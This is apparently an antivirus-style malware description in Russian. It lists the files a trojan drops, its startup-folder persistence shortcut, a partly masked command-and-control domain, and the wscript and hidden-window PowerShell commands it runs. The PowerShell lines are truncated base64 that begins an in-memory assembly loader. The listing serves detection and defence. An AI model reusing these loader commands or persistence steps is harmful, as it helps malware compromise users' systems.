Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\chrome.ini.lnk
- %TEMP%\id.js
- %TEMP%\id.vbs
- %APPDATA%\microsoft\windows\templates\chrome.js
- %TEMP%\id.vbs
- 'ip###ger.org':443
- DNS ASK ip###ger.org
- '<SYSTEM32>\wscript.exe' "%TEMP%\ID.js"
- '<SYSTEM32>\wscript.exe' "%TEMP%\ID.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADIAMgA7AFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADIAMgA7AFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...